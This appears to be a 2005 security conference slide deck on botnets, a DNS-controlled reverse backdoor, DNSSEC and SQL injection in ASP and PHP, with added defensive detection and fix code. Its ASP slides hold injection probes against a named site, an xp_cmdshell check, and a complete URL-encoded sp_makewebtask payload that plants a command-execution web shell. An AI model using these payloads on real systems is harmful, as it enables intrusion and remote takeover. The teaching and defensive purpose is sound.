WISE 2005 Conference Presented by Erion Lin, Department of Information Management, National Taiwan University
Outline
• Introduction
• Network Security
  • Botnet
  • Forensic Analysis of Reverse Backdoor
  • DNSSEC
  • Net Gap
• Program Security
  • SQL Injection
  • Security Problems of ASP
  • Security Problems of PHP
  • Some Hack Skills
• Conclusion
Introduction
• Many information security incidents broke out in 2004
• Hackers from mainland China intruded into the Presidential Office website
• Mainland cyber forces are a threat to our digital society
• Millions of National Health Insurance and vehicle registration records were leaked
• A large increase in the number of cybercrime cases
Introduction (Cont'd)
• On 21 October 2004 the Executive Yuan issued the "Concrete Implementation Plan for Government Agencies (Institutions) on Handling Information Security Incidents", requiring that "every government agency (institution), when handling extremely important or important sensitive documents, data and files, shall store them encrypted and, except where a network connection is absolutely necessary, shall also adopt protective measures such as physical isolation, so as to prevent intrusion, destruction, tampering, deletion or unauthorized access."
Botnet [diagram: a hacker on the Internet commands Zombie1 to Zombie5; on command the zombies attack the target]
Bi-apple Backdoor, Initial State [diagram: hacker, Bi-apple DNS server and Zombie1 to Zombie3 on the Internet; firewall, DMZ DNS server and router in front of the victim's intranet. The backdoor on the victim polls rabbi.bi-apple.net, which resolves to 127.0.0.1, so it stays dormant]
Backdoor Active State [diagram: the hacker changes rabbi.bi-apple.net on the Bi-apple DNS server to 61.221.104.181, an attacker-controlled address; the victim's DNS server now returns 61.221.104.181]
Backdoor Active State (Cont'd) [diagram: the victim sends a SYN to 61.221.104.181:80, an outbound connection the firewall allows; over that connection the hacker remote-controls the victim and launches attacks against the target server]
Features of the Bi-apple Backdoor
• Hard to detect: it opens no listening port, and while dormant its control name resolves to 127.0.0.1
• Reverse backdoor: the victim connects out to port 80, which most firewalls allow
• Easy to change the zombie: the hacker only has to update the DNS record
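One place the Bi-apple design does leave a trace is the resolver: the same client resolves one name again and again to 127.0.0.1 and then suddenly gets a routable address. The script below is an added example (not from the slides) that looks for exactly that pattern in resolver logs. The four-column log format (time, client, qname, answer) and the sample lines are constructed for the example; `parse_log` must be adapted to the real query/response log format of your resolver.

```python
"""Spot a dormant dynamic-DNS reverse backdoor in resolver logs.

Added example, not from the WISE 2005 slides. The signal is a client that
repeatedly resolves one name to an unreachable ("parked") address and then
receives a globally routable one. Log format and sample lines are constructed.
"""
import ipaddress
from collections import defaultdict

# Constructed sample: one host polls the control name every five minutes.
SAMPLE_LOG = """\
2005-03-01T09:00:01 10.0.0.15 rabbi.bi-apple.net 127.0.0.1
2005-03-01T09:05:02 10.0.0.15 rabbi.bi-apple.net 127.0.0.1
2005-03-01T09:07:11 10.0.0.22 www.example.com 93.184.216.34
2005-03-01T09:10:03 10.0.0.15 rabbi.bi-apple.net 127.0.0.1
2005-03-01T09:15:04 10.0.0.15 rabbi.bi-apple.net 61.221.104.181
2005-03-01T09:20:05 10.0.0.15 rabbi.bi-apple.net 61.221.104.181
"""


def parse_log(text):
    """Return a list of (timestamp, client, qname, answer_ip); malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, qname, answer = parts
        try:
            ip = ipaddress.ip_address(answer)
        except ValueError:
            continue  # NXDOMAIN or CNAME-only answers carry no address
        records.append((ts, client, qname.lower().rstrip("."), ip))
    return records


def is_parked(ip):
    """An answer the client cannot reach: loopback or the unspecified address.
    Private ranges are deliberately not counted, since internal names legitimately
    resolve to them."""
    return ip.is_loopback or ip.is_unspecified


def find_dormant_to_active(records, min_dormant=2):
    """Return {(client, qname): (first_active_ts, active_ip)} for every client/name
    pair that saw at least `min_dormant` parked answers in a row and then a global one."""
    history = defaultdict(list)
    for ts, client, qname, ip in records:
        history[(client, qname)].append((ts, ip))
    hits = {}
    for key, answers in history.items():
        parked_run = 0
        for ts, ip in answers:
            if is_parked(ip):
                parked_run += 1
            elif ip.is_global and parked_run >= min_dormant:
                hits[key] = (ts, str(ip))
                break
            else:
                parked_run = 0  # a normal answer breaks the dormant run
    return hits


if __name__ == "__main__":
    for (client, name), (ts, ip) in find_dormant_to_active(parse_log(SAMPLE_LOG)).items():
        print(f"{client} polled {name} while it was parked, then got {ip} at {ts}")
```

The same check also catches the "easy to change the zombie" property: every flip to a new global address after a parked run is a fresh hit, so a long-running host that keeps moving its control server shows up each time it does.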
Digital Forensic Analysis
• On-Line Analysis
• Off-Line Analysis
On-Line Analysis
• Emergency recovery
• Find out the root cause
On-Line Analysis Steps
• Remove the process
• Remove the file and registry entries
• Reboot
Step 9: Stop Running Processes
• explorer.exe
• IEXPLORE.exe
(The malicious Browser Helper Object DLL is loaded inside these two processes, so they must be stopped before the DLL and its registry entries can be removed.)
Step 10: Delete Malicious Registry Entries
• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B49DA3DF-E569-423d-BDEA-8F89128E8107}
• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2E8A6CF6-3500-4A7D-9F54-69CD76D367D2}
Step 11: Reboot
• Check system activities again
• Check network activities again
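Before deleting BHO keys it helps to know which DLL each CLSID actually loads, and to compare the list against a known-clean baseline rather than trusting the DLL's location. The following added example (not from the slides) parses a `reg export` of the Browser Helper Objects key together with the matching `HKCR\CLSID\{...}\InprocServer32` entries and flags every BHO that is either not on an allowlist or loads from an unusual directory. The export text, the DLL paths, the allowlisted CLSID and the `msbho.dll` / `ie_helper.dll` names are all constructed for the example; only the two flagged CLSIDs come from the slides.

```python
"""Enumerate Browser Helper Objects from a .reg export and flag suspicious ones.

Added example, not from the slides. On the live host the input would come from
  reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" bho.reg
  reg export HKCR\CLSID clsid.reg
Here both exports are concatenated into one constructed string so the code runs anywhere.
"""

BHO_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"

# Constructed export: the two CLSIDs from the slides plus one allowlisted benign entry.
REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B49DA3DF-E569-423d-BDEA-8F89128E8107}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2E8A6CF6-3500-4A7D-9F54-69CD76D367D2}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0D0CAA6A-8F7E-4A08-B2B3-0E7D7E0D0F01}]

[HKEY_CLASSES_ROOT\CLSID\{B49DA3DF-E569-423d-BDEA-8F89128E8107}\InprocServer32]
@="C:\\WINDOWS\\system32\\msbho.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{2E8A6CF6-3500-4A7D-9F54-69CD76D367D2}\InprocServer32]
@="C:\\Documents and Settings\\user\\Local Settings\\Temp\\ie_helper.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{0D0CAA6A-8F7E-4A08-B2B3-0E7D7E0D0F01}\InprocServer32]
@="C:\\Program Files\\Vendor\\Helper\\vendorbho.dll"
"ThreadingModel"="Apartment"
"""

# Constructed allowlist: CLSIDs taken from a known-clean machine of the same build.
KNOWN_GOOD = {"{0D0CAA6A-8F7E-4A08-B2B3-0E7D7E0D0F01}"}
# Directories a legitimate BHO normally lives in; a DLL elsewhere is worth a look.
SAFE_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\")


def parse_reg(text):
    """Return {key_path: {value_name: data}} for the string values of a .reg export."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current and "=" in line:
            name, _, data = line.partition("=")
            name = "(Default)" if name == "@" else name.strip('"')
            # .reg files escape backslashes in string data as "\\"
            keys[current][name] = data.strip('"').replace("\\\\", "\\")
    return keys


def list_bhos(reg):
    """Join each BHO CLSID to the DLL its InprocServer32 key points at.
    Returns [(clsid, dll_path, suspicious)]."""
    result = []
    for key in reg:
        if not key.startswith(BHO_KEY + "\\"):
            continue
        clsid = key.rsplit("\\", 1)[1]
        server = reg.get("HKEY_CLASSES_ROOT\\CLSID\\" + clsid + "\\InprocServer32", {})
        dll = server.get("(Default)", "<no InprocServer32>")
        suspicious = clsid.upper() not in {g.upper() for g in KNOWN_GOOD} \
            or not dll.lower().startswith(SAFE_DIRS)
        result.append((clsid, dll, suspicious))
    return result


if __name__ == "__main__":
    for clsid, dll, suspicious in list_bhos(parse_reg(REG_EXPORT)):
        print(("SUSPECT " if suspicious else "ok      ") + clsid + "  " + dll)
```

Note that the first slide CLSID is flagged even though its DLL sits in system32: the allowlist comparison, not the path, is what catches it. A path heuristic alone would have missed a backdoor dropped into a system directory.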
Normal DNS [diagram: the DNS server accepts both the genuine DNS message from the DNS administrator and the fake DNS message from the hacker]
DNSSEC [diagram: a DNS server using TSIG/SIG(0) accepts the administrator's message and rejects the hacker's fake message]
DNSSEC
• TSIG (RFC 2845): a secret key shared by the two parties; a keyed one-way hash (HMAC) over the message authenticates it
• SIG(0) (RFC 2931): a public-key signature over the message
(Both authenticate a transaction such as a dynamic update or zone transfer between two hosts; signing of the zone data itself, with DNSKEY/RRSIG records, is the separate part of DNSSEC.)
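The slide names the two ingredients of TSIG, a shared secret and a one-way hash, without showing why the hacker's fake update is rejected. The added example below (not from the slides) implements the principle: an HMAC over the update, the key name and a timestamp, verified on the server side in constant time and within a time window. It is a simplified model, not the TSIG record wire format, which also covers the algorithm name, fudge and error fields; the key name, the secret and the update strings are constructed.

```python
"""Transaction authentication with a shared secret, in the style of TSIG.

Added example, not from the slides. Shows the HMAC principle TSIG (RFC 2845)
relies on; the MAC input here is a simplification of the real TSIG format.
Key name, secret and update payloads are constructed for the example.
"""
import base64
import hashlib
import hmac
import time

# Constructed shared secret, as would be given in a BIND `key` statement (hmac-sha256).
KEY_NAME = "admin-key."
SECRET = base64.b64decode("fwLl6XIpGbJ5tEYZ1hZpqGNp3Ksh8oS8zqkXzQjK5Bs=")


def sign_update(message: bytes, key_name=KEY_NAME, secret=SECRET, signed_at=None):
    """Client side. Returns (mac, signed_at). The MAC covers the message, the key
    name and the time so a captured update cannot be replayed later or re-pointed
    at another key."""
    signed_at = int(time.time()) if signed_at is None else signed_at
    h = hmac.new(secret, digestmod=hashlib.sha256)
    h.update(message)
    h.update(key_name.encode())
    h.update(signed_at.to_bytes(6, "big"))  # TSIG also uses a 48-bit time field
    return h.digest(), signed_at


def verify_update(message, mac, signed_at, key_name, keys, now=None, fudge=300):
    """Server side. Look the key up by name, check the time window, recompute the
    MAC and compare in constant time. Returns (accepted, reason)."""
    secret = keys.get(key_name)
    if secret is None:
        return False, "unknown key"
    now = int(time.time()) if now is None else now
    if abs(now - signed_at) > fudge:
        return False, "time outside fudge window"
    expected, _ = sign_update(message, key_name, secret, signed_at)
    if not hmac.compare_digest(expected, mac):
        return False, "bad signature"
    return True, "ok"


KEYS = {KEY_NAME: SECRET}  # the server's configured keys


def demo():
    """Administrator's update accepted; hacker's edited copy and a replay rejected."""
    legit = b"UPDATE example.com. A www.example.com. 192.0.2.10"
    mac, t = sign_update(legit, signed_at=1_100_000_000)
    ok = verify_update(legit, mac, t, KEY_NAME, KEYS, now=1_100_000_010)
    # The hacker rewrites the address but cannot recompute the MAC without the secret.
    forged = b"UPDATE example.com. A www.example.com. 61.221.104.181"
    bad = verify_update(forged, mac, t, KEY_NAME, KEYS, now=1_100_000_010)
    # The genuine message and MAC replayed an hour later fail the time check.
    replay = verify_update(legit, mac, t, KEY_NAME, KEYS, now=1_100_003_600)
    return ok, bad, replay


if __name__ == "__main__":
    print(demo())
```

The time window is not decoration: without it a sniffed, correctly signed update is as good as the original, which is why TSIG carries a signed time and a fudge value.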
Net Gap [diagram: Internet → Firewall → Net Gap1 → Net Gap2 → Router → Intranet. Malicious TCP/IP packets stop at Net Gap1; only the processed content is handed to Net Gap2, which rebuilds normal TCP/IP packets for the intranet]
Net Gap (Cont'd)
• Net Gap1: deconstructs packets
• Net Gap2: reconstructs packets
SQL Injection
• The attacker can execute arbitrary SQL queries and/or commands on the backend database server through the web application.
SQL Injection Detection Skill
• Before (error-based)
  • http://www.ox.com.tw/script.asp?id=2' – IE returns an ODBC error.
• New generation (boolean-based; works even when error messages are suppressed)
  • http://www.ox.com.tw/script.asp?id=2 and 1=1 – IE returns the normal record.
  • http://www.ox.com.tw/script.asp?id=2 and 1=2 – IE returns no record.
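The three probes on the slide are easy to reproduce against a small vulnerable query, and putting the fixed query next to it shows why the probes stop working once the value is bound as a parameter. The added example below (not from the slides) uses an in-memory SQLite table standing in for the ASP page's MS SQL backend; the table, its rows and the `news`/`title` names are constructed. The MS SQL specific probes later in the deck follow the same true/false pattern, only the right-hand side of `and 1=(...)` changes.

```python
"""Boolean-based and error-based SQL injection probes against a vulnerable
lookup, with the parameterized fix beside it.

Added example, not from the slides. SQLite stands in for MS SQL so the code
runs offline; the table and rows are constructed.
"""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(1, "Budget"), (2, "Election"), (3, "Weather")])
    return db


def vulnerable_lookup(db, id_param: str):
    """Mirrors script.asp?id=...: the parameter is pasted into the SQL text.
    Returns the rows, or the error text such a page would leak to the browser."""
    try:
        return db.execute(f"SELECT title FROM news WHERE id={id_param}").fetchall()
    except sqlite3.Error as e:
        return f"ERROR: {e}"


def safe_lookup(db, id_param: str):
    """Fixed version: the value must be an integer and is bound, never concatenated."""
    try:
        n = int(id_param)
    except ValueError:
        return []
    return db.execute("SELECT title FROM news WHERE id=?", (n,)).fetchall()


def probe(lookup, db, id_value="2"):
    """Run the slide's three probes. Injectable if the quote raises a DB error, or
    if 'and 1=1' matches the normal page while 'and 1=2' differs from it."""
    baseline = lookup(db, id_value)
    quote = lookup(db, id_value + "'")
    true_ = lookup(db, id_value + " and 1=1")
    false_ = lookup(db, id_value + " and 1=2")
    error_based = isinstance(quote, str)
    boolean_based = true_ == baseline and false_ != baseline
    return {"quote": quote, "true": true_, "false": false_,
            "injectable": error_based or boolean_based}


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe(vulnerable_lookup, db))
    print("fixed:     ", probe(safe_lookup, db))
```

Comparing the `1=1` response with the baseline, not only with the `1=2` response, avoids a false positive on pages that simply return nothing for any odd-looking parameter.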
Security Problems of ASP [attack flowchart; recoverable structure:]
• Entry points: SQL injection, upload area, directory traversal, file information leak, configuration file / default configuration
• SQL injection → DB detecting → MS SQL / MySQL / Oracle / others (mdb, db2, Informix)
• MS SQL → xp_cmdshell (XP_CMDSHELL recovery if it was removed) → echo script / echo exe file
• Firewall outbound testing → FTP / TFTP / Windows file sharing
• Goals: install web shell, add new account, install backdoor
• Outcomes: success / failure
Hack Skills of ASP
• ASP SQL Injection
• MSSQL DB Detection Skill
• MSSQL Stored Procedure Skill
• ASP WebShell Skill
• Firewall Outbound Shell
• One Way Hacking
• Backdoor Skill
Security Problems of PHP [attack flowchart; recoverable structure:]
• Entry points: SQL injection, program defect, upload area, directory traversal, file information leak, configuration file / default configuration
• SQL injection → DB detection → MS SQL / MySQL / Oracle / others (mdb, db2, Informix)
• MySQL → load file testing → system configuration file / password file / homepage source code → password breaking program → account and password
• MySQL → save file testing → system section writable / web section writable → install web shell / install backdoor
• MySQL → create temp DB / save backdoor into DB / override MySQL
• Outcomes: success / failure
Hack Skills of PHP
• Writable Directory Testing Skill
• File Uploading DB Skill
• Temp Table Design Skill
• PHP WebShell Skill
• Password Breaking Skill
• Unix Backdoor Skill
MSSQL DB Detection Skill
• and 1=(select @@version)
• MSSQL version information: the server cannot convert the @@version string to the integer it is compared with, and the conversion error message echoes the version string.
MSSQL Stored Procedure Skill
• http://www.ox.com.tw/asp/test.asp?id=294 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
• If xp_cmdshell exists (count is 1, so 1=1 is true), the original news record is displayed
• If xp_cmdshell does not exist (count is 0), an error message appears or the page redirects to the home page
ASP WebShell Skill
• Injected through the URL, so it is URL-encoded: %3d is =, %25 is %, %26 is &. sp_makewebtask writes the query result into a file under the web root; the doubled single quotes inside @query are SQL escaping for the quotes of the ASP page being written.
exec sp_makewebtask @outputfile%3d'c:\inetpub\wwwroot/a.asp',@charset%3dbig5,@query%3d'select ''<%25On Error Resume Next : Set oscript %3d Server.CreateObject("wscript.SHELL") : Set oscriptNet %3d Server.CreateObject("wscript.NETWORK") : Set oFileSys %3d Server.CreateObject("scripting.FileSystemObject") : szCMD %3d Request.Form(".CMD") : If (szCMD <>"")Then : szTempFile %3d "C:\" %26 oFileSys.GetTempName() : Call oscript.Run ("cmd.exe /c " %26 szCMD %26 " > " %26 szTempFile, 0, True) : Set oFile %3d oFilesys.OpenTextFile (szTempFile, 1, False, 0) End If %25> <HTML><BODY><FORM action%3d"<%25%3d Request.ServerVariables("URL")%25>" method%3d"POST"> <input type%3dtext name%3d".CMD" size%3d45 value%3d"<%25%3d szCMD %25>"><input type%3dsubmit value%3d"Run"> </FORM><PRE> <%25 If (IsObject(oFile))Then : On Error Resume Next : Response.Write Server.HTMLEncode(oFile.ReadAll) : oFile.Close : Call oFileSys.DeleteFile(szTempFile, True) : End If%25> </BODY></HTML>'''
Backdoor Skills
• Port reuse technique
• Typical representative backdoor: Hacker's Door (駭客之門)
• It consists of a single DLL that starts itself by infecting a system file; the size and date of the infected system file do not change. It also uses thread injection, so it has no process of its own; it opens no port itself but reuses any port already opened by a system process, such as 80, 135, 139 or 445.
Reuse Port Skill [diagram: the firewall allows inbound 21 and 80 only and restricts all outbound traffic; the hacker's IE or ftp client (steps 1 to 3 in the figure) reaches the backdoor (BD) through the port already opened by the Web/FTP server, so no new listening port and no outbound connection is needed]
Conclusion
• Software security quality
  • Identify all data that comes from user input.
  • Handle meta-characters carefully.
  • Do not return detailed error messages to the user.
  • Understand the characteristics of the programming language in use.
  • Avoid APIs that invoke a shell directly.
  • Check every application's default settings.
• New version of BS7799
  • Different vendors.
• Information security education
  • Management, information and systems